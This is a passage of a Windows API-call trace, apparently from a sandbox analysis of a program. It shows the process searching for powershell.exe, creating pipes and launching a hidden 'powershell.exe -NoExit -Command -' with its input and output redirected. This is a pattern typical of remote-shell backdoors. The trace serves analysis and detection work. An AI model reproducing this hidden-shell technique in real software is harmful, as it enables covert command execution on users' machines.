hTemplateFile=0x0) returned 0xffffffffffffffff [0084.237] GetFileAttributesExW (in: lpFileName="C:\\Windows\\powershell.exe" (normalized: "c:\\windows\\powershell.exe"), fInfoLevelId=0x0, lpFileInformation=0xc0000cb558 | out: lpFileInformation=0xc0000cb558*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0084.237] CreateFileW (lpFileName="C:\\Windows\\powershell.exe" (normalized: "c:\\windows\\powershell.exe"), dwDesiredAccess=0x0, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x2000000, hTemplateFile=0x0) returned 0xffffffffffffffff [0084.237] GetFileAttributesExW (in: lpFileName="C:\\Windows\\powershell.exe.com" (normalized: "c:\\windows\\powershell.exe.com"), fInfoLevelId=0x0, lpFileInformation=0xc0000cb558 | out: lpFileInformation=0xc0000cb558*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0084.237] CreateFileW (lpFileName="C:\\Windows\\powershell.exe.com" (normalized: "c:\\windows\\powershell.exe.com"), dwDesiredAccess=0x0, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x2000000, hTemplateFile=0x0) returned 0xffffffffffffffff [0084.237] GetFileAttributesExW (in: lpFileName="C:\\Windows\\powershell.exe.exe" (normalized: "c:\\windows\\powershell.exe.exe"), fInfoLevelId=0x0, lpFileInformation=0xc0000cb558 | out: lpFileInformation=0xc0000cb558*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0084.237] CreateFileW (lpFileName="C:\\Windows\\powershell.exe.exe" (normalized: "c:\\windows\\powershell.exe.exe"), dwDesiredAccess=0x0, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x2000000, hTemplateFile=0x0) returned 0xffffffffffffffff [0084.237] GetFileAttributesExW (in: lpFileName="C:\\Windows\\powershell.exe.bat" (normalized: "c:\\windows\\powershell.exe.bat"), fInfoLevelId=0x0, lpFileInformation=0xc0000cb558 | out: lpFileInformation=0xc0000cb558*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0084.237] CreateFileW (lpFileName="C:\\Windows\\powershell.exe.bat" (normalized: "c:\\windows\\powershell.exe.bat"), dwDesiredAccess=0x0, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x2000000, hTemplateFile=0x0) returned 0xffffffffffffffff [0084.238] GetFileAttributesExW (in: lpFileName="C:\\Windows\\powershell.exe.cmd" (normalized: "c:\\windows\\powershell.exe.cmd"), fInfoLevelId=0x0, lpFileInformation=0xc0000cb558 | out: lpFileInformation=0xc0000cb558*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0084.238] CreateFileW (lpFileName="C:\\Windows\\powershell.exe.cmd" (normalized: "c:\\windows\\powershell.exe.cmd"), dwDesiredAccess=0x0, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x2000000, hTemplateFile=0x0) returned 0xffffffffffffffff [0084.238] GetFileAttributesExW (in: lpFileName="C:\\Windows\\powershell.exe.vbs" (normalized: "c:\\windows\\powershell.exe.vbs"), fInfoLevelId=0x0, lpFileInformation=0xc0000cb558 | out: lpFileInformation=0xc0000cb558*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0084.238] CreateFileW (lpFileName="C:\\Windows\\powershell.exe.vbs" (normalized: "c:\\windows\\powershell.exe.vbs"), dwDesiredAccess=0x0, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x2000000, hTemplateFile=0x0) returned 0xffffffffffffffff [0084.238] GetFileAttributesExW (in: lpFileName="C:\\Windows\\powershell.exe.vbe" (normalized: "c:\\windows\\powershell.exe.vbe"), fInfoLevelId=0x0, lpFileInformation=0xc0000cb558 | out: lpFileInformation=0xc0000cb558*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0084.238] CreateFileW (lpFileName="C:\\Windows\\powershell.exe.vbe" (normalized: "c:\\windows\\powershell.exe.vbe"), dwDesiredAccess=0x0, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x2000000, hTemplateFile=0x0) returned 0xffffffffffffffff [0084.239] GetFileAttributesExW (in: lpFileName="C:\\Windows\\powershell.exe.js" (normalized: "c:\\windows\\powershell.exe.js"), fInfoLevelId=0x0, lpFileInformation=0xc0000cb558 | out: lpFileInformation=0xc0000cb558*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0084.239] CreateFileW (lpFileName="C:\\Windows\\powershell.exe.js" (normalized: "c:\\windows\\powershell.exe.js"), dwDesiredAccess=0x0, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x2000000, hTemplateFile=0x0) returned 0xffffffffffffffff [0084.239] GetFileAttributesExW (in: lpFileName="C:\\Windows\\powershell.exe.jse" (normalized: "c:\\windows\\powershell.exe.jse"), fInfoLevelId=0x0, lpFileInformation=0xc0000cb558 | out: lpFileInformation=0xc0000cb558*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0084.239] CreateFileW (lpFileName="C:\\Windows\\powershell.exe.jse" (normalized: "c:\\windows\\powershell.exe.jse"), dwDesiredAccess=0x0, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x2000000, hTemplateFile=0x0) returned 0xffffffffffffffff [0084.239] GetFileAttributesExW (in: lpFileName="C:\\Windows\\powershell.exe.wsf" (normalized: "c:\\windows\\powershell.exe.wsf"), fInfoLevelId=0x0, lpFileInformation=0xc0000cb558 | out: lpFileInformation=0xc0000cb558*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0084.239] CreateFileW (lpFileName="C:\\Windows\\powershell.exe.wsf" (normalized: "c:\\windows\\powershell.exe.wsf"), dwDesiredAccess=0x0, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x2000000, hTemplateFile=0x0) returned 0xffffffffffffffff [0084.239] GetFileAttributesExW (in: lpFileName="C:\\Windows\\powershell.exe.wsh" (normalized: "c:\\windows\\powershell.exe.wsh"), fInfoLevelId=0x0, lpFileInformation=0xc0000cb558 | out: lpFileInformation=0xc0000cb558*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0084.239] CreateFileW (lpFileName="C:\\Windows\\powershell.exe.wsh" (normalized: "c:\\windows\\powershell.exe.wsh"), dwDesiredAccess=0x0, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x2000000, hTemplateFile=0x0) returned 0xffffffffffffffff [0084.239] GetFileAttributesExW (in: lpFileName="C:\\Windows\\powershell.exe.msc" (normalized: "c:\\windows\\powershell.exe.msc"), fInfoLevelId=0x0, lpFileInformation=0xc0000cb558 | out: lpFileInformation=0xc0000cb558*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0084.239] CreateFileW (lpFileName="C:\\Windows\\powershell.exe.msc" (normalized: "c:\\windows\\powershell.exe.msc"), dwDesiredAccess=0x0, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x2000000, hTemplateFile=0x0) returned 0xffffffffffffffff [0084.239] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\Wbem\\powershell.exe" (normalized: "c:\\windows\\system32\\wbem\\powershell.exe"), fInfoLevelId=0x0, lpFileInformation=0xc0000cb558 | out: lpFileInformation=0xc0000cb558*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0084.240] CreateFileW (lpFileName="C:\\Windows\\System32\\Wbem\\powershell.exe" (normalized: "c:\\windows\\system32\\wbem\\powershell.exe"), dwDesiredAccess=0x0, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x2000000, hTemplateFile=0x0) returned 0xffffffffffffffff [0084.240] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\Wbem\\powershell.exe.com" (normalized: "c:\\windows\\system32\\wbem\\powershell.exe.com"), fInfoLevelId=0x0, lpFileInformation=0xc0000cb558 | out: lpFileInformation=0xc0000cb558*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0084.240] CreateFileW (lpFileName="C:\\Windows\\System32\\Wbem\\powershell.exe.com" (normalized: "c:\\windows\\system32\\wbem\\powershell.exe.com"), dwDesiredAccess=0x0, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x2000000, hTemplateFile=0x0) returned 0xffffffffffffffff [0084.240] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\Wbem\\powershell.exe.exe" (normalized: "c:\\windows\\system32\\wbem\\powershell.exe.exe"), fInfoLevelId=0x0, lpFileInformation=0xc0000cb558 | out: lpFileInformation=0xc0000cb558*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0084.240] CreateFileW (lpFileName="C:\\Windows\\System32\\Wbem\\powershell.exe.exe" (normalized: "c:\\windows\\system32\\wbem\\powershell.exe.exe"), dwDesiredAccess=0x0, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x2000000, hTemplateFile=0x0) returned 0xffffffffffffffff [0084.240] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\Wbem\\powershell.exe.bat" (normalized: "c:\\windows\\system32\\wbem\\powershell.exe.bat"), fInfoLevelId=0x0, lpFileInformation=0xc0000cb558 | out: lpFileInformation=0xc0000cb558*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0084.240] CreateFileW (lpFileName="C:\\Windows\\System32\\Wbem\\powershell.exe.bat" (normalized: "c:\\windows\\system32\\wbem\\powershell.exe.bat"), dwDesiredAccess=0x0, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x2000000, hTemplateFile=0x0) returned 0xffffffffffffffff [0084.241] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\Wbem\\powershell.exe.cmd" (normalized: "c:\\windows\\system32\\wbem\\powershell.exe.cmd"), fInfoLevelId=0x0, lpFileInformation=0xc0000cb558 | out: lpFileInformation=0xc0000cb558*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0084.241] CreateFileW (lpFileName="C:\\Windows\\System32\\Wbem\\powershell.exe.cmd" (normalized: "c:\\windows\\system32\\wbem\\powershell.exe.cmd"), dwDesiredAccess=0x0, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x2000000, hTemplateFile=0x0) returned 0xffffffffffffffff [0084.241] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\Wbem\\powershell.exe.vbs" (normalized: "c:\\windows\\system32\\wbem\\powershell.exe.vbs"), fInfoLevelId=0x0, lpFileInformation=0xc0000cb558 | out: lpFileInformation=0xc0000cb558*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0084.241] CreateFileW (lpFileName="C:\\Windows\\System32\\Wbem\\powershell.exe.vbs" (normalized: "c:\\windows\\system32\\wbem\\powershell.exe.vbs"), dwDesiredAccess=0x0, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x2000000, hTemplateFile=0x0) returned 0xffffffffffffffff [0084.241] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\Wbem\\powershell.exe.vbe" (normalized: "c:\\windows\\system32\\wbem\\powershell.exe.vbe"), fInfoLevelId=0x0, lpFileInformation=0xc0000cb558 | out: lpFileInformation=0xc0000cb558*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0084.241] CreateFileW (lpFileName="C:\\Windows\\System32\\Wbem\\powershell.exe.vbe" (normalized: "c:\\windows\\system32\\wbem\\powershell.exe.vbe"), dwDesiredAccess=0x0, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x2000000, hTemplateFile=0x0) returned 0xffffffffffffffff [0084.241] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\Wbem\\powershell.exe.js" (normalized: "c:\\windows\\system32\\wbem\\powershell.exe.js"), fInfoLevelId=0x0, lpFileInformation=0xc0000cb558 | out: lpFileInformation=0xc0000cb558*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0084.241] CreateFileW (lpFileName="C:\\Windows\\System32\\Wbem\\powershell.exe.js" (normalized: "c:\\windows\\system32\\wbem\\powershell.exe.js"), dwDesiredAccess=0x0, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x2000000, hTemplateFile=0x0) returned 0xffffffffffffffff [0084.241] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\Wbem\\powershell.exe.jse" (normalized: "c:\\windows\\system32\\wbem\\powershell.exe.jse"), fInfoLevelId=0x0, lpFileInformation=0xc0000cb558 | out: lpFileInformation=0xc0000cb558*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0084.241] CreateFileW (lpFileName="C:\\Windows\\System32\\Wbem\\powershell.exe.jse" (normalized: "c:\\windows\\system32\\wbem\\powershell.exe.jse"), dwDesiredAccess=0x0, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x2000000, hTemplateFile=0x0) returned 0xffffffffffffffff [0084.241] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\Wbem\\powershell.exe.wsf" (normalized: "c:\\windows\\system32\\wbem\\powershell.exe.wsf"), fInfoLevelId=0x0, lpFileInformation=0xc0000cb558 | out: lpFileInformation=0xc0000cb558*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0084.241] CreateFileW (lpFileName="C:\\Windows\\System32\\Wbem\\powershell.exe.wsf" (normalized: "c:\\windows\\system32\\wbem\\powershell.exe.wsf"), dwDesiredAccess=0x0, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x2000000, hTemplateFile=0x0) returned 0xffffffffffffffff [0084.241] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\Wbem\\powershell.exe.wsh" (normalized: "c:\\windows\\system32\\wbem\\powershell.exe.wsh"), fInfoLevelId=0x0, lpFileInformation=0xc0000cb558 | out: lpFileInformation=0xc0000cb558*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0084.242] CreateFileW (lpFileName="C:\\Windows\\System32\\Wbem\\powershell.exe.wsh" (normalized: "c:\\windows\\system32\\wbem\\powershell.exe.wsh"), dwDesiredAccess=0x0, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x2000000, hTemplateFile=0x0) returned 0xffffffffffffffff [0084.242] VirtualAlloc (lpAddress=0xc0000e6000, dwSize=0x2000, flAllocationType=0x1000, flProtect=0x4) returned 0xc0000e6000 [0084.243] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\Wbem\\powershell.exe.msc" (normalized: "c:\\windows\\system32\\wbem\\powershell.exe.msc"), fInfoLevelId=0x0, lpFileInformation=0xc0000cb558 | out: lpFileInformation=0xc0000cb558*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0084.243] CreateFileW (lpFileName="C:\\Windows\\System32\\Wbem\\powershell.exe.msc" (normalized: "c:\\windows\\system32\\wbem\\powershell.exe.msc"), dwDesiredAccess=0x0, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x2000000, hTemplateFile=0x0) returned 0xffffffffffffffff [0084.243] VirtualAlloc (lpAddress=0xc0000e8000, dwSize=0x2000, flAllocationType=0x1000, flProtect=0x4) returned 0xc0000e8000 [0084.243] VirtualAlloc (lpAddress=0xc0000ea000, dwSize=0x2000, flAllocationType=0x1000, flProtect=0x4) returned 0xc0000ea000 [0084.243] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\powershell.exe"), fInfoLevelId=0x0, lpFileInformation=0xc0000cb558 | out: lpFileInformation=0xc0000cb558*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x82dd7f7c, ftCreationTime.dwHighDateTime=0x1ca0414, ftLastAccessTime.dwLowDateTime=0x82dd7f7c, ftLastAccessTime.dwHighDateTime=0x1ca0414, ftLastWriteTime.dwLowDateTime=0xe84fc9b0, ftLastWriteTime.dwHighDateTime=0x1ca0423, nFileSizeHigh=0x0, nFileSizeLow=0x73a00)) returned 1 [0084.243] VirtualAlloc (lpAddress=0xc0000ec000, dwSize=0x2000, flAllocationType=0x1000, flProtect=0x4) returned 0xc0000ec000 [0084.244] CreatePipe (in: hReadPipe=0xc0000cba10, hWritePipe=0xc0000cba18, lpPipeAttributes=0x0, nSize=0x0 | out: hReadPipe=0xc0000cba10*=0xdc, hWritePipe=0xc0000cba18*=0xd4) returned 1 [0084.244] VirtualAlloc (lpAddress=0xc0000ee000, dwSize=0x2000, flAllocationType=0x1000, flProtect=0x4) returned 0xc0000ee000 [0084.244] CreatePipe (in: hReadPipe=0xc0000cba18, hWritePipe=0xc0000cba20, lpPipeAttributes=0x0, nSize=0x0 | out: hReadPipe=0xc0000cba18*=0xfc, hWritePipe=0xc0000cba20*=0xd0) returned 1 [0084.244] CreatePipe (in: hReadPipe=0xc0000cba18, hWritePipe=0xc0000cba20, lpPipeAttributes=0x0, nSize=0x0 | out: hReadPipe=0xc0000cba18*=0x104, hWritePipe=0xc0000cba20*=0x100) returned 1 [0084.245] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0xc0000d41a0, nSize=0x64 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0084.245] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\powershell.exe"), fInfoLevelId=0x0, lpFileInformation=0xc0000cb3c0 | out: lpFileInformation=0xc0000cb3c0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x82dd7f7c, ftCreationTime.dwHighDateTime=0x1ca0414, ftLastAccessTime.dwLowDateTime=0x82dd7f7c, ftLastAccessTime.dwHighDateTime=0x1ca0414, ftLastWriteTime.dwLowDateTime=0xe84fc9b0, ftLastWriteTime.dwHighDateTime=0x1ca0423, nFileSizeHigh=0x0, nFileSizeLow=0x73a00)) returned 1 [0084.245] GetEnvironmentStringsW () returned 0x803190* [0084.245] VirtualAlloc (lpAddress=0xc0000f0000, dwSize=0x2000, flAllocationType=0x1000, flProtect=0x4) returned 0xc0000f0000 [0084.245] VirtualAlloc (lpAddress=0xc0000f2000, dwSize=0x2000, flAllocationType=0x1000, flProtect=0x4) returned 0xc0000f2000 [0084.246] FreeEnvironmentStringsW (penv=0x803190) returned 1 [0084.246] VirtualAlloc (lpAddress=0xc0000f4000, dwSize=0x2000, flAllocationType=0x1000, flProtect=0x4) returned 0xc0000f4000 [0084.246] GetCurrentProcess () returned 0xffffffffffffffff [0084.246] DuplicateHandle (in: hSourceProcessHandle=0xffffffffffffffff, hSourceHandle=0xdc, hTargetProcessHandle=0xffffffffffffffff, lpTargetHandle=0xc0000a0800, dwDesiredAccess=0x0, bInheritHandle=1, dwOptions=0x2 | out: lpTargetHandle=0xc0000a0800*=0x108) returned 1 [0084.246] VirtualAlloc (lpAddress=0xc0000f6000, dwSize=0x2000, flAllocationType=0x1000, flProtect=0x4) returned 0xc0000f6000 [0084.247] DuplicateHandle (in: hSourceProcessHandle=0xffffffffffffffff, hSourceHandle=0xd0, hTargetProcessHandle=0xffffffffffffffff, lpTargetHandle=0xc0000a0808, dwDesiredAccess=0x0, bInheritHandle=1, dwOptions=0x2 | out: lpTargetHandle=0xc0000a0808*=0x10c) returned 1 [0084.247] DuplicateHandle (in: hSourceProcessHandle=0xffffffffffffffff, hSourceHandle=0x100, hTargetProcessHandle=0xffffffffffffffff, lpTargetHandle=0xc0000a0810, dwDesiredAccess=0x0, bInheritHandle=1, dwOptions=0x2 | out: lpTargetHandle=0xc0000a0810*=0x110) returned 1 [0084.247] VirtualAlloc (lpAddress=0xc0000f8000, dwSize=0x4000, flAllocationType=0x1000, flProtect=0x4) returned 0xc0000f8000 [0084.247] VirtualAlloc (lpAddress=0xc0000fc000, dwSize=0x4000, flAllocationType=0x1000, flProtect=0x4) returned 0xc0000fc000 [0084.248] VirtualAlloc (lpAddress=0xc000180000, dwSize=0x2000, flAllocationType=0x1000, flProtect=0x4) returned 0xc000180000 [0084.249] CreateProcessW (in: lpApplicationName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", lpCommandLine="powershell.exe -NoExit -Command -", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x400, lpEnvironment=0xc000180000, lpCurrentDirectory=0x0, lpStartupInfo=0xc0000cb798*(cb=0x68, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x100, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x108, hStdOutput=0x10c, hStdError=0x110), lpProcessInformation=0xc0000cb6a8 | out: lpCommandLine="powershell.exe -NoExit -Command -", lpProcessInformation=0xc0000cb6a8*(hProcess=0x118, hThread=0x114, dwProcessId=0xa08, dwThreadId=0xa8c)) returned 1 [0084.258] SetEvent (hEvent=0xf0) returned 1 [0084.258] CloseHandle (hObject=0x114) returned 1 [0084.258] CloseHandle (hObject=0x110) returned 1 [0084.259] CloseHandle (hObject=0x10c) returned 1 [0084.259] CloseHandle (hObject=0x108) returned 1 [0084.259] CancelIoEx (hFile=0xdc, lpOverlapped=0x0) returned 0 [0084.259] CloseHandle (hObject=0xdc) returned 1 [0084.259] CancelIoEx (hFile=0xd0, lpOverlapped=0x0) returned 0 [0084.259] CloseHandle (hObject=0xd0) returned 1 [0084.259] CancelIoEx (hFile=0x100, lpOverlapped=0x0) returned 0 [0084.259] 